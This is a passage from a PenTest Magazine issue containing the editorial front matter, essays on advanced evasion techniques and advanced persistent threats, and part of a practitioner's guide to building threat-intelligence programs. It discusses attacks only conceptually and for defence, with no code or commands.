Pt08 19 final1

1
EDITORIAL TEAM
Managing Editor
Bartłomiej Adach
Proofreaders & Betatesters
Lee McKenzie, Natalie Fahey, David Kosorok, Avi Benchimol, Tom Updegrove,
Bernhard Waldecker, Girshel Chokhonelidze, Hammad Arshed, Matthew Sabin,
Kevin Goosie, Ricardo Puga, Clancey McNeal, Ali Abdollahi, Craig Thornton.
Special thanks to the Proofreaders & Betatesters who helped with this issue. Without their
assistance there would not be a PenTest Magazine.
Senior Consultant/Publisher
Paweł Marciniak
CEO
Joanna Kretowicz

DTP
Bartłomiej Adach
bartek.adach@pentestmag.com
joanna.kretowicz@pentestmag.com
bartek.adach@pentestmag.com
COVER DESIGN
Hiep Nguyen Duc
PUBLISHER
Hakin9 Media Sp. z o.o. 
02-676 Warszawa 
ul. Postępu 17D  
Phone: 1 917 338 3631
www.pentestmag.com
All trademarks, trade names, or logos mentioned or used are the property of their respective owners.
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility
for misuse of the presented techniques or consequent data loss.

Dear PenTest Readers,
Another summer edition of our magazine is here, and it’s full of valuable infosec content. The two
opening articles are related to the topic of Advanced Persistent Threats. Professor John Walker starts
with presenting the interdependence of ATPs and Advanced Evasion Techniques (AET). In the article he
tries to answer the question why Persistent Threats and Evasions will not see any decline any time soon.
Mariana Peycheva, in turn, presents the analysis of Advanced Persistent Threats and its methodology,
giving a great overview the topic. As one of our reviewers said: “I wish that most of business leaders and
managers would read this”.
Chris Cochran wrote a very interesting piece, which can be considered as a guide for those building,
executing, or consuming threat intelligence. Abhi Singh is the author of a thought leadership article on
securing the API economy. It describes, at a high level, what kind of processes and architecture it would
take to make a secure and resilient API ecosystem. Pal Patel provides the readers with really interesting
case study on the usage of Right To Left Override technique. You should definitely check this article out
and find out more about this interesting trick!
Two of our regular contributors, Bohdan Ethics and Dinesh Sharma, provided new articles this month as
well. Bohdan brought to the table a presentation of antivirus evasion basics. Dinesh presents the
readers with different types of compliance audits, with a special angle on critical infrastructure. Ankit Giri
emphasizes the significance of mobile exploit applications in article, Vlad Martin points our attention to
the way in which black hats are collecting personal data in the Commonwealth of Independent State
member-countries, and, last but not least, David Evenden and Kent Potter present the Collegiate
Cybersecurity Education Program that they developed together.
 
Special thanks to all of the contributors, reviewers, and proofreaders involved in the process of creation
of this issue.  
 
Without further ado,
Enjoy the content!
PenTest Magazine’s Editorial Team.
2

Contents
Long-Armed Persistence of Threats
Compliance Audit for Critical Infrastructure
Ankit Giri
4
Advanced Persistent Threats – Silent But Smart
Mariana Peycheva 10
The Threat Intelligence EASY Button
Chris Cochran 17
21
Black Hats: How They Are Collecting Personal Data in
the CIS Countries
31
55
Right to Left Override (RTLO) Technique
35Bohdan Ethics
Antivirus Evasion Basics
Dinesh Sharma
69
63
Vlad Martin
73
Prof. John Walker
Pal Patel
Kent Potter and David Evenden
How StandardUser Is Working with Practitioners and
Universities to Close the Talent Gap
The Signiﬁcance of Mobile Exploit Applications
Abhi Singh
Securing the API Economy

It was circa 2010/11 when I was approached by a Helsinki-based company – Stonesoft. Stonesoft wanted to
discuss a new angled threat vector which they referred to as the AET (Advanced Evasion Technique). I agreed
to meet with them at the InfoSecurity show of the day in London, and approached the conversation with more
than a little skepticism - could this be yet another InfoSec over-hyped terminology? Surrounded with the usual
InfoSecurity run-of-mill, mundane talk of the day, which in that year was PCI-DSS and, of course, Penetration
Testing, it would be at least refreshing to learn about something new. With doubt in my mind, the conversation
4
Time is now long past that dictates a fresh way of delivering agile cyber-defense is
now a must have, with the recognition that something, somewhere must change if
we are to win the cyber-security race. No matter what we deploy, and how we
operate those commercially procured systems and applications, one fact is certain –
we will encounter a Persistent Threat on an every-day basis in some form – it may be
a matter of such encountered threats are passive, awaiting their time to go
malevolent at their opportune moment; or, active and already on a mission to avoid
detection whilst delivering payload. It is now time to act, and look at Cyber-Security
in a new way, with joined up thinking, along with a recognition and guarantee that we
have been or will be breached.
22 years in Royal Air Force Security/Investigations and Counter
Intelligence operations [Overt/Covert] service, working alongside GCHQ,
CESG, UK and US Agencies, ITSO and Systems Security Manager for
CIA Accredited Systems, Visiting Professor School of Science/
Technology - Nottingham Trent University [NTU], Advisory Board,
Research Centre in Cyber Security (KirCCS) at University of Kent,
Mentor to Tallinn University (Estonia) Masters Students Cyber
Research, Practicing and Registered Expert Witness, Certiﬁed Forensics
Investigator Practitioner [CFIP], Editorial Member at MedCrave
Research for Forensics & Criminology, ENISA CEI Listed Expert,
Editorial Member of the Cyber Security Research Institute [CRSI], Digital
Forensics/Cyber Security Listed Trainer at Meirc [Dubai] of Certiﬁed
courses, and Fellow of Royal Society for the Arts [FRSA], writer for
Apress Publishing New York, and a Belkasoft (Digital Forensics) Partner.
Professor John Walker

progressed, and I was introduced to this new hypothesis of this AET thing. As the conversation proceeded with
my introduction to the AET, the theoretical value started to gain traction, and I found myself being pulled into
what I had considered a concept, toward the fact that it was possibly a new threat vector with significant
implications of insecurity.
The basics of the AET were to evolve and utilize evasion techniques as a means to disguise and/or modify
cyber-attacks through network connections, and to thus avoid detection by those deployed systems which
were supposedly delivering protection to the corporate valued assets. The objective here was, of course, to
achieve the successful delivery of hidden malicious content (payload), and the onward exploitation of a
vulnerable target host – here seeing Network Security Devices that are designed to conduct real-time, deep-
packet inspection of the network traffic rendered potentially ineffective resulting in:
• Critical digital assets left unprotected
• A false sense of security born out of dependencies on supposed secure, up to date commercial network
defenses
• Organizations left not meeting their regulatory compliancy requirements
• A higher success rate of encountered network attacks
• A shift in the Threat Landscape supporting opportunities of high reward (financial, strategic, political or
technical) for the ‘advanced’ tech-savvy cyber-criminals
Given that at the time of the AET threat first being made public, the Verizon 2010 Business Data Breach
Investigations of the day Report stated that approximately 20% of incidents where malware had been
discovered had an unknown component for the infection vector – which moves us down the road of Zero Days,
a state which in 2019 has seen significant leap forward in growth, combined with an increase in cross-platform
threats - it may be thus reasonable to conclude that, what was seen as a new threat in 2010/11, is now a threat
vector with a close similarity to the Elephant in the Room!
The basis of the AET was simply to manipulate the IP Stack in such a way that the encountering IPS/IDS, or
firewalling technology would be confused by what its interface was seeing in the profile of a malformed stack,
and thus, in theory, would take one of, or a combination of, five actions:
1. Block
2. Allow
3. Alert
4. Write to the Log
5. Not write to the Log
5

At the time of the AET being made public, there were 180+ stackable and combinable evasions being
researched in testing framework, meaning that these built up to a potential set of attack vectors, which were
concluded to be impossible to counter against all combinations without some form of an automated evasion
testing framework without which, vendors were denied the opportunities to develop adequate anti-evasion
capabilities and network defenses – a situation that gets worse when applied under IPv6, which offers a vastly
expanded combination of a malevolent cyber-universe, as described by Stonesoft’s Harri Haanpää as:
“Evasion techniques are a means to disguise and/or modify cyber-attacks to avoid detection and blocking by
information security systems. They typically make use of rarely used protocol properties in unusual
combinations and deliberate protocol violations. Such obfuscations may confuse the detection capabilities
of intrusion prevention/detection systems.”
At the time of the early work into the AET, Jack Walsh Program Manager (ICSA labs) concluded that “Advanced
Evasion Techniques can evade (and did) many network security systems. He went on to comment, we were
able to validate Stonesoft’s research and believe that these Advanced Evasion Techniques can result in lost
corporate assets with potentially serious consequences for breached organizations.” To add to the weight
behind, what was then, and to a large extent, and still is an ignored threat, Bob Walder, Research Director at
Gartner commented, “Recent research indicates that Advanced Evasion Techniques are real and credible – not
to mention growing – a growing threat against the network security infrastructure that protects governments,
commerce and information-sharing worldwide. Network security vendors need to devote the research and
resources to finding a solution.“ – and yet at that time, and even today, the threats are still largely ignored, or
should I say tolerated.
However, up to this point in time, I was only listening to the theoretical description of the threat of this new
‘AET’ conversation, but I was interested enough to agree to work alongside Stonesoft and visited their labs in
Helsinki to see the pragmatic side of the conversation. At the site within their lab conditions, the highly skilled
Stonesoft Team demonstrated testing against a variety of the latest release, up-to-date firewalling products for
their exposure to the AET threat, and the discoveries were astonishing, with results for all tested devices of:
• Bypass of the perimeter device to reach a supposedly protected asset
• Logs not being updated, or annotated with the wrong information
Upon returning from my visit, I was convinced that the new age AET threat was real and along with Stonesoft
wrote a paper on the subject. However, as one always encounters in the Cyber Security Industry, that paper
and the research of Stonesoft was challenged, with one of the most vocal being from McAfee who denounced
the research outright – interestingly enough, notwithstanding their public opinion on the AET, McAfee acquired
Stonesoft for $389 million in 2013 - I can only conclude that the paper and research they denounced must have
struck a note which enticed them to put their hands in their pockets of denial!
On the associated subject of the APT (Active Persistent Threat), we can see the emergence of the AET into a
new combined landscape of network dangers – dangers I have observed first hand inflicting breaches and
6

compromises on the supposedly protected end-points, resulting in the bypass of firewalls, IDS, and IPS alike.
However, it is here where we start to see the strain of ignored system updates taking their toll. For example, the
continued use of out of patch operating systems, like seventeen year old Windows XP, which saw the massive
and successful WannaCry attack on the NHS, which cost the taxpayer £92 million, and resulted in the
cancellation of over 19,000 appointments – some of which had real-world, life inflicting consequences. It is also
still possible to see the old approach where Internal systems are not maintained with an adequate security
profile on the premise that they are hidden from the external interface that points to the dangerous outside
world, and thus are not accommodated by Anti Malware Protection, or as I encountered at an Oil and Gas
company any form of logging set against systems/folders storing critical data assets. In such cases as these,
the AET and the combination of the APT are ideal partners, with the AET serving up the means by which to
avoid detection and to deliver its payload (the APT), with the APT taking on the profile of, say, the Conficker
agent, which is a great little bit of malware to create a shell condition on its vulnerable targeted system – and
from there if the attacker is lucky enough, they will find other routine on-system tools such as the Windows
Management Instrumentation Command line (WMIC (wmic.exe)), which offers a multitude of intelligence
gathering and compromise opportunities - and then there is the much forgotten dangers from the world of DNS,
which can leave a great big black-hole open in the style of a Cuckoo’s Egg attack leveraging on a Zone Transfer
to quietly discover internal gems, which in one first-hand case concerning an East Midlands based Credit
Reference Agency, allowed the acquisition of a script containing a hard coded User ID and the associated
Password – and then of course onward potentials for compromise!
wmic.exe
7

Having started off circa 2010, we now move into the year 2019 in which we still see the risks and attack vectors
of the AET and APT at an all-time-high, and this against a backdrop of a higher than ever spend on security,
alongside the associated growth of complexities of a cyber-dependent, always connected business and social
society – a world, according to McAfee some years back, in which they were winning the Cyber-Security Race
– I think not! The time is here where we need to ask the right questions about our level of deployed defenses,
starting with those shown in the below image:
So, where are we today? Evidenced by the long list of breached and compromised originations who have
invested small fortunes and placed their ultimate trust in commercial devices and staff to defend their
technology-kingdoms, one may only conclude that the case to argue that Persistent Threats and Evasions are
not seeing any demise soon, and the question must be asked what is going wrong? Is it that:
• The reliance on the over-priced commercial promise, Silver Bullet security device, with over-expectation of the
actual capabilities to defend the network is flawed?
• We have gone down the long-path of Tick-Box Compliance led security approach so far, we have parted
company with the bit-and-bobs of technical security skills?
• The Skills Gap issue in the Cyber Space is now hitting its mark with an adverse effect?
• Under-maintained, over exposed assets residing on the network adds to the conundrum of insecurity?
8
1. Security Level Evaluation/audits of existing
security devices
Do evasions pose a threat to us (or not)?
Have we evaluated security risks correctly, and
are we managing these risks?
2. New Product Evaluation for investment
decisions
Which product offers highest protection against
evasions?
How can I verify vendor claims?
3. Redesigning network security
Is our security level high enough?
Where to place or relocate IPS/deep packet
inspection devices? And what kind?

• Or ﬁnally, as with the combination of an AET with the APT, is it that the aforementioned all have their own part
to play in a world that will assure the Persistent Threats will continue to evolve and bite!
Looking back over the years from 2010 right up to 2019, what is so very interesting is that the only thing that
has changed is that the situation of insecurity has become far worse in a world in which Persistent Threats are
ever present, and being leveraged by a range of adversarial actors, from those with quick-win monetary gain in
mind, to the state-sponsored activities of the geopolitical aggressors, not to mention the groups of
commercially motivated serious and organized crime gangs. Thus, time is now long past that dictates a fresh
way of delivering agile cyber-defense is now a must have, with the recognition that something, somewhere
must change if we are to win the cyber-security race. No matter what we deploy, and how we operate those
commercially procured systems and applications, one fact is certain – we will encounter a Persistent Threat on
an every-day basis in some form – it may be a matter of such encountered threats are passive, awaiting their
time to go malevolent at their opportune moment; or, active and already on a mission to avoid detection whilst
delivering payload. It is now time to act, and look at Cyber-Security in a new way, with joined up thinking, along
with a recognition and guarantee that we have been or will be breached. We must start to evolve the mindset of
deployed states of readiness that are associated with the recognition that the proactive defenses may be (are)
ﬂawed, and take up a robust posture on the reactive side of ‘Response’ to underpin structured engagements
and recovery from the most adverse of anticipated known-unknown conditions of the Persistent Threat. Above
all, we must deploy our infrastructures from the ground up in a well formed, well documented and potentially
segmented way to take into account that the Persistent Threats will be seeking to leverage and exploit any one
of many combinations of exposure opportunities to deliver their show-stopping payload!
9

Advanced Persistent Threats – Silent But
Smart
Introduction
The term Advanced Persistent Threats, or ATP, featured in the general terminology of the information security
profession in mid-January 2010 when Google announced that its intellectual property was a victim of a targeted
attack originating in China. Google is not the only one; more than 30 other technology companies, military
contractors and large enterprises have been hacked by hackers who used a suite of social engineering,
targeted malware, and surveillance technologies to secretly gain access to piles of sensitive corporate data [1].
10
According to a study by ISACA, phishing is the most common way for lunching APT
as it gives the attacker an opportunity to gain initial access to the organization, and
considering the human factor as one of the biggest vulnerabilities, makes the
defense mechanism against initial attacks very difficult for design. It was evident
from the study that 53.4% of the people believe APT is not much different from
traditional attacking methods. However, 93.9% of the people agreed that APTs poses
a significant threat to national security and economic stability. Among the critical
findings in this survey paper are that 63% of the people believe that it’s just a matter
of time before their organization becomes a victim of an APT attack, while only 60%
believe that they are capable enough to stop such an attack.
Mariana Peycheva
Mariana Peycheva is CSO for the Unified
Communications and Collaboration division
of Atos.

Google's public recognition has raised the issue of targeted long-term attacks by well-prepared attackers
seeking access to corporate property and military information. It also launched a series of vendors promoting
promising anti-APT products and services that only obscure the issue for security managers and activity
managers [1].
The US Air Force built the phrase Advanced Persistent Threats in 2006, as their teams needed to communicate
with partners in the unclassified public administration world. People from the Department of Defense usually
give classified names of specific threats and attackers and use them to describe the activities of participants in
those threats. If the Air Force wants to talk about some intrusion with other personnel, they would not be able
to use the classified name of the actor in the threat. Therefore, they built the term APT as an unclassified
nickname [1]. At early stages, such attacks were dedicated to government or financial organizations, but now
the domain is much larger.
APTs target specific actors in the threats; APTs do not refer to vague and shady internet powers. The term is
most commonly applied to various groups operating in the Asia-Pacific region. Those who are familiar with APT
activities may have an honest dispute about whether the term should be used to refer only to some participants
in the Asia Pacific region [1] or whether it can be expanded as a general classifier. In other words, if criminals
from Eastern Europe work using the same tools, tactics, and procedures as traditional APTs, will these actors
also bear the APT label?
The answer to this question depends on the person asking it. An IT security specialist in a private organization
will usually not be interested in whether the participants in the threat attacking the company are from Asia and
the Pacific or Eastern Europe. The reason they perform the same defensive actions, regardless of the location
or nationality of the opponent. However, anyone with legal and/or national security responsibility who
implements diplomatic, intelligence, military or economic measures will undoubtedly want to determine the
origin of an attack [1].
Long-time there was not a clear understating of what ATP is. Several factors contributed to the overall sense of
confusion:
• With no details to discuss, the security community turned to just about anyone ready to talk about the
incident. In too many cases, speakers have turned out to be providers who saw APT as a marketing
opportunity to recover fast-falling security costs [1].
• Many analysts are strictly focused on the elements of the incident that they understand best, irrespective of
the true nature of the event [1]. Companies that specialize in botnet research assume that botnets were
involved, others focused on vulnerability identification and breach development. Unfortunately, botnets have
nothing to do with APT, and vulnerabilities, breaches, and malware are just elements of APT incidents, not
their core functions.
• Impact of APT - Economic advantages, strategic benefits, stealing sensitive information, so the goals can be
political such as undermining internal stability or economic goals based on the theft of victims' intellectual
11

property. Logically there are technical objectives that extend the ability to complete the mission. These
include gaining access to source code to develop breaks further or to study the work of security to conquer
better or break it. The most worrying thing is that attackers can make changes to improve their positions and
weaken the victim [1].
Analysts rate APT activities as having four main goals and describe the enemy as follows:
Advanced means that opponents can act across the spectrum of a computer attack. They can use the most
trivial, easily accessible breakthroughs against well-known vulnerabilities, or elevate their game to exploring
new vulnerabilities and develop specific breakthrough methods that depend on the situation of the target.
Persistent means that the enemy has the specific task of completing his mission. These are not casual
attackers. They receive directives from their bosses in the same way as an intelligence group. Being
persistent does not necessarily mean that they are continually executing malicious code on victims'
computers [1]. Instead, they maintain a certain level of engagement necessary to fulfill their purpose.
The threat means that the opponent is not a piece of meaningless code. It is a threat that is organized,
funded, and motivated. Some people talk about many "groups" consisting of specialized "crews" with a
variety of missions [1].
The traditional attack is usually performed by one person, aggressive, very rapid, smash and grab, tactic based
on a minimal time-based attack, but ATP is repeated attempts using several methods, stealth approach, adapts
to resist defenses, very slow to avoid any suspicions may involve sleep modes before commencing any attack
[2].
As it was already mentioned, there are cyber espionage groups associated with various ATP attacks.
In 2018, TrendMicro security researchers reported an attack using Android malware matching Bahamut’s code
(Mobile Device Management (MDM) tool detected in a campaign targeting iPhone devices in India), but which
connects to its command and control (C&C) infrastructure.
Some of these C&C’s, which also act as phishing sites, attempt to lure users into downloading malicious
applications via links to Google Play. Such kind of applications and codes can retrieve network information and
the MAC address, steal SMS messages and contacts, record audio, retrieve GPS location, and steal files with
specific extensions, even steal screenshots of messages.
In short, APT is an adversary who performs bold operations (called networked computer operations) to maintain
information about the status of their goals.
APT is characterized by its persistence in maintaining some degree of control over the target's computer
infrastructure, acting continuously to preserve or restore control and access. At informal counterintelligence and
the military meetings, their analysts use the term "aggressive" to emphasize the extent to which APT pursues
its goals against the various governmental, military, and private targets.
12

Let’s take a deeper look on the ATP methodology:
The ATP attack is based on four of five stages, but generally, it can be summarized as breaking in, scanning
the network, identifying the target, making it accessible to accomplish the goal, and escaping the network
without leaving any trace or evidence [2].
1. At stage one, the attacker can use different techniques like social engineering, open-source intelligence tools
(OSINT) or approaching an organization which sells data or information about multinational firms. This step
aims to know the target and gather as much information as possible about it.
As there are countless ways to conduct the initial step of infiltrating, defining a security baseline or a model to
stop the initial attack is quite a challenge. Having in mind the persistent approach in APT, it is only a matter of
time for an attacker to find a backdoor in security mechanism [2].
2. At stage two – breaking in. We can expect that the attacker will exploit the weakness and gain access to the
target network. They can use an indirect approach technique such as spear phishing, watering hole attack, or
zero-day virus to infiltrate and deploy any remote access tool for further activities.
A common approach is the use of email combined with social engineering – a targeted user received a link in
an email from a reliable person or source bringing the user to a linked website which contains a malicious
JavaScript payload, browser downloads, and executes it. They can simply send an attachment in the email
presuming from a reliable source, or just through an infected USB, which attached to a window-based system,
will auto-execute a malware without user interaction utilizing zero-day vulnerability.
A different approach, defined as direct, is easy for understanding – the attacker can compromise any third party
working at the organization and use the privilege to gain access to any system or server [2].
Identifying target – as the definition suggests, in this stage, the attacker searches and identifies the target
data. The chances of being caught are quite high, as the attacker will be scanning the network for its target and
this could result in abnormal traffic behavior or trespassing of data files or access violations on the network [2].
If the attacker succeeds to identify the targets, they have to make it accessible or acquire the appropriate rights
to access that data. Rootkits can also be secretly installed on targeted systems and network access points to
monitor or capture data and commands as they stream over the network. The captured information can be
utilized to give invaders the information they need to plan future attacks or to make target data accessible. At
this stage, being persistent is a key feature for stealing the information [2].
Fleeing the network - Finally, the hacker will try to escape and cover the tracks, so that it becomes more
challenging to identify the attacker and to detect the damage done. In some cases, the attacker uses APT to
gain long-term access or to drop a back door so that the network can be accessed whenever required [2].
APT is an approach based on phases. Usually, 3 to 4 stages and most of the organizations are not even aware
that an APT attack happened on their network [2].
13

How to protect from ATP?
This is not a simple attack, but logically designed and composed of numerous hacking tools and processes
following a sophisticated pattern to achieve its objective. The victim is “inspected” constantly over a long
period. The attackers are not “Script Kiddies” but possess a high level of knowledge and plenty of resources so
we should not expect a simple solution. Many of the “classic” security tools are unable to manage this
purposeful and previously considered attack. For example, when using software that may be untrustworthy, it
is essential to use it in a sandboxed area so that other software, files, and applications are not compromised
[3]. If no adverse actions are detected after a while, then it is assumed that the code is safe, and it is allowed to
execute. But the malware developers are smart, and they can bypass this detection technique by having their
code sit dormant for days or even weeks before activating and wreaking havoc.
To react to this threat first, we shall discover and analyze it.
The network traffic analysis, which follows the traffic and applications, is one of the needed components in the
layered designed defense. Ideally, there will be an engine that identifies malware and activities signaling an
attempted attack. A detection intelligence can aid your rapid response.
Email security is a highly escalated topic nowadays. Different advanced malware detection techniques identify
and block the spear-phishing emails. As we discovered from an example structure of the attack, the phishing is
the initial phase of most targeted attacks. They can discover malicious content, attachments, and URL links
that pass unnoticed through standard email security.
Endpoint security - Monitoring that records and reports detailed system activities to allow threat analysts to
assess the nature and extent of an attack rapidly. It is also a mandatory part of a sophisticated defense
technique. Most forms of malware and advanced persistent threats enter the enterprise through vulnerable
endpoints [4].
To detect malware based on file signatures or blacklisting seemed to be very inefficient techniques in the fight
with ATP.
Following the customer needs, the security vendors have started to take radically new approaches to
combating malware and APTs.
For example, Trend Micro Deep Discovery solutions for network, email, endpoint, and integrated protection
provide advanced threat protection [5]. It was designed as a management solution that helps large enterprise
and government organizations. It provides network-wide visibility, a significant control needed in this kind of
protection, detection engines focus on identifying advanced malware and human attacker and a real-time
dashboard presenting the in-depth analysis and actionable intelligence required to prevent, discover, and
contain attacks against corporate data alongside with a console providing real-time threat visibility and detailed
scrutiny in an intuitive multi-level format. Thereafter, the security professionals can focus on risks, deep forensic
analysis, and rapidly implement containment and remediation procedures [6].
14

Untestable Trend Micro, and not the only vendor, focus their attention to APT. McAfee claims that their
Advanced Threat Defense combines in-depth static code analysis, dynamic analysis (malware sandboxing), and
machine learning to increase zero-day threat detection, including threats that use evasion techniques and
ransomware which allows us to uncover hidden risks. Alongside the threat intelligence sharing option, which
makes possible the immediate sharing of threat intelligence across the entire infrastructure, the solution
supports offline analysis options, and advanced features enable security operations centers to validate threats.
The centralized analysis covers multiple protocols and recommended products, including email gateways.
Surely going through different vendors will we find that most of them provide sophisticated solutions which can
support the security professionals in their efforts against APT.
To conclude, an APT is a layered attack. Therefore, the defense should be designed on layers too. Starting with
phishing campaigns, whose aim is not to “catch” the unprepared employee but to give us a clear
understanding of how vulnerable is the human factor in the organization. There should be procedures and
policies that implement regular and mandatory training for employees – how to recognize the phishing, how to
report it and protect themselves and the enterprise. The security professionals should never forget that the
employees are the first level of defense. Other policies can forbid any server outside of the company premises
to send emails from the organization’s domain, combined with operational security on the email gateway. Other
functional security techniques shall be implemented regularly on the mail gateway level, and there are many
good alternates already offered from the vendors.
Good security protection on host level plus tools can be used by security teams to monitor the end system
behavior offline or even better to integrate an automated intelligence.
As discussed, the network security techniques shall be armed with tools for network traffic analyses which
recognize malicious behavior.
And finally, the organization shall invest in good security professionals, different security knowledge among the
different teams is needed. The leads should understand well that the investment in their employees, continuous
education and clarification, and better knowledge is mandatory.
According to a study by ISACA, phishing is the most common way for lunching APT as it gives the attacker an
opportunity to gain initial access to the organization, and considering the human factor as one of the biggest
vulnerabilities, makes the defense mechanism against initial attacks very difficult for design. It was evident from
the study that 53.4% of the people believe APT is not much different from traditional attacking methods.
However, 93.9% of the people agreed that APTs poses a significant threat to national security and economic
stability. Among the critical findings in this survey paper are that 63% of the people believe that it’s just a matter
of time before their organization becomes a victim of an APT attack, while only 60% believe that they are
capable enough to stop such an attack [2].
The most effective fight against APT is having trained and knowledgeable information security analysts. Many
security providers have adopted APT in their advertising cast. Some offer the opportunity to detect APT in the
15

potential victim's networks. Another has even registered APT domain names. Tools are always helpful, but the
best advice I can provide is to educate business leaders about threats so that they support organizational
security programs drawn up by competent and knowledgeable employees [1].
An APT can be considered as one of the most threatening security concerns. As the world advances towards
IoT (Internet of things), certain measures need to be taken so that APT attacks can be handled with ease [2].
At a technical level, building visibility will provide the organization with an awareness of the situation and a
chance to detect and thwart APT activity. Without information from the network, hosts, logs, and other sources,
even the most skilled analyst is rendered helpless. Fortunately, obtaining such information is not a new
challenge, and most security departments are already using such programs [1].
The purpose of combating ATP operations should be to make it as diﬃcult as possible for an adversary trying
to steal intellectual property, or as some say, to increase its price per megabyte.
References:
1. https://searchsecurity.techtarget.com/magazineContent/Understanding-the-advanced-persistent-
threat
2. https://pdfs.semanticscholar.org/c6c3/06e7e4253885bd2d0ed25b8f2524fbbb2a92.pdf
3. https://www.techopedia.com/deﬁnition/25266/sandboxing
4. https://www.networkworld.com/category/advanced-persistent-threats/?start=20
5. https://interwork.com/wp-content/uploads/2016/12/sb01_dd_overview_140526us.pdf
6. https://www.helpnetsecurity.com/2012/03/01/trend-micro-unveils-apt-management-solution/  
16

Introduction
We have all seen it. Ineffective threat intelligence is happening across the globe. There are teams writing
resource intensive weekly products that many will not read. There are companies buying intelligence feeds that
will not be operationalized. There are intelligence teams that are not aligned to their stakeholders and there is
not a process to gather that feedback to make course corrections. This article is not an attempt to belittle the
efforts of budding intelligence teams. This article aspires to be a guide for those building, executing, or
consuming threat intelligence.
17
Requirements are the foundation of an intelligence program. I have been a part of
teams where this was not done. We would project our own thoughts and biases into
our support of other teams without gathering the stakeholder’s thoughts or
concerns. As you read this, I am sure you see how big of a misstep this is. However,
this is not likely an isolated incident. In fact, many of the teams I have coached
missed this crucial step. Luckily, this step is one of the easiest to fix. Open up the
calendar and schedule meetings with your stakeholders. During the meeting, be
present and listen more than you speak. Write down possible requirements and ask
validation questions. You will then be on your way to building an effective program.
Chris Cochran is former active duty US Marine Intelligence. Chris has
dedicated his career to building advanced cybersecurity and
intelligence capabilities for national-level governments and the private
sector. He has led intelligence programs at the National Security
Agency, US Cyber Command, US House of Representatives, financial,
and high-tech sector companies. He currently leads the threat
intelligence and operations program at Netflix. Chris has made it his
personal mission to motivate and empower cybersecurity professionals
and teams through coaching, his podcast, and speaking engagements.
His concern for the ever-growing cyber skill gap serves as a motivator
for his need to inspire the next generation of cyber warriors to take the
helm.
Chris Cochran

The more I grow in my career, the more I look to give back to the professionals making their way through the
cybersecurity landscape. I found myself answering the same messages and questions about threat intelligence.
One day I thought to myself, “Wouldn’t it be great to have a threat intelligence EASY button that people could
press to help guide them through this process?” I have spent my career coaching intelligence analysts and
teams and 85% of that advice can be boiled to four simple, but sometimes difficult, concepts that serve as a
touchstone for intelligence leaders and practitioners. These concepts are:
• Elicit Requirements
• Assess Collection Plan
• Strive for Impact
• Yield to Feedback
There you have it, the Intelligence EASY Button. These concepts are what I have always done and with a dab of
creativity, I was able to distill my philosophy into digestible nuggets.
Let's take some time to look at each of these individually.
Elicit Requirements
"It's not me, it's you." - Lily Allen
If you have been following my LinkedIn for a while or listen to my podcast, I have foot-stomped this concept on
many occasions. Threat intelligence teams, companies, experts are in the "service" business. We support
OTHER functions. While I do believe threat intelligence leads security, our work is not about us, it is about our
stakeholders. We need to know what information they require that will make their jobs more efficient, more
effective, or change what they are doing entirely. You will encounter some stakeholders that do not know what
information will aid those objectives. These are some of my favorite situations. You can have an "aha" moment
right there with your stakeholders. Ask questions. Ask good questions. Practice asking questions and refine
your stakeholder analysis. You will find, the more polished the requirements, the easier it is to support your
stakeholders.
You will want to do the best you can to get this right. Requirements are the foundation of an intelligence
program. I have been a part of teams where this was not done. We would project our own thoughts and biases
into our support of other teams without gathering the stakeholder’s thoughts or concerns. As you read this, I
am sure you see how big of a misstep this is. However, this is not likely an isolated incident. In fact, many of the
teams I have coached missed this crucial step. Luckily, this step is one of the easiest to fix. Open up the
calendar and schedule meetings with your stakeholders. During the meeting, be present and listen more than
you speak. Write down possible requirements and ask validation questions. You will then be on your way to
building an effective program.
Assess Collection Plan
"Everybody has plans, until they get hit." - Mike Tyson
If you are starting a threat intelligence program and you have a fleshed out collection plan before you did your
first stakeholder interview, I assess with HIGH confidence you will have to go back to the drawing board. Even
18

after you have done stakeholder analysis and there are new requirements that come up, you will have to look at
what information you are currently using for your analysis. Ask yourself, "Is this feed answering the questions
my stakeholders have?" Every feed is not for every team. A great source may not have the answers you are
looking for. Constantly reassess your collection plan and be aggressive in trimming away the non-essential.
When your requirements change, do some due diligence and make sure you can support given your current
collection posture.
Threat feeds are not silver bullets for intelligence. Threat feeds can be an incredible force-multiplier or a waste
of funds. Efforts must be made to ensure you are using the vendors and feeds you pay for. Look at efficient
ways to enrich your incident response using this data. Use your feed to reach quick determinations on the
reputation of indicators. Distill TTPs into digestible data points for your detection and threat hunting
capabilities. Optimize your resources and squeeze all of the functionality out of your feeds. Once you have
practice at this, it will be easier to do the same for other solutions.
Strive for Impact
What you do has far greater impact than what you say.” - Stephen Covey
Let me paint a picture. You have spent the last two months working on a report you believe will change the
game at your company. You were diligent in your analysis. You included the best research from world-renowned
experts. You polished it up real nice with the help of a couple editors. You even had marketing take a stab at
making graphics for you. You deliver your masterpiece and... crickets. You wait a few days and ask, "Hey, what
was the reception of the report?" Your boss replies, "It was great work! Everyone loved it. The only problem is
they didn't understand the 'So what?'" Ouch... I have been there and I am sure many of you have been there
too. The beauty of threat intelligence or intelligence in general is it has the ability, and often goal, of inciting
change. The work I do can literally change the way my company operates, if I strive for impact in my
intelligence analysis and reporting. Take some time and think about what information is going to who, in what
context, and to support what decision, every time you hit send on that email.
Let me let you in on a little secret. In my current role, I am cheating. I am responsible for threat intelligence and
production, but I also lead threat operations AKA our purple team. There are many definitions of a purple team.
The way we look at it:
• Threat intelligence sets the threat context
• The red team emulates that threat in conjunction with risk priorities set by the organization
• The blue team, or threat hunters, are trying to find all of the malicious activity your security appliances are not,
including the red team
• Ultimately, you want to automate a successful hunt and add to your detections
This process is incredibly powerful. You iteratively close gaps in the organization's security posture. I know
what you must be thinking, “Chris, we do not have dedicated red teamers or threat hunters.” Neither do we at
my current role. We have implemented a reservist model that allows people to step into those roles periodically
so we can execute the mission without hiring dedicated teams. This reiterates the concept of optimizing what
you have access to, including people.
19

Yield to Feedback
“Feedback is the breakfast of champions.” - Ken Blanchard
Before I even begin talking about using feedback, I feel obligated to provide a tip about receiving feedback.
Please, make it easy for your stakeholder to present feedback. For instance, I built a simple Google form that I
can send pre-filled with context data to the stakeholder that can be filled in under a minute, if they so wish.
Subsequently, I produce a shareable link and personally message the stakeholder. I thank them for submitting
the request for information and ask them to fill out the form. I also mention it will take only moments of their
time. It is not my intent to boast, but under this construct I have a 100% return on my request for feedback.
Now once you have your feedback, use it! Even if you believe your stakeholder is misaligned in some way, that
still means the mark is being missed. Are your reports too long? Are they missing key details? Was your
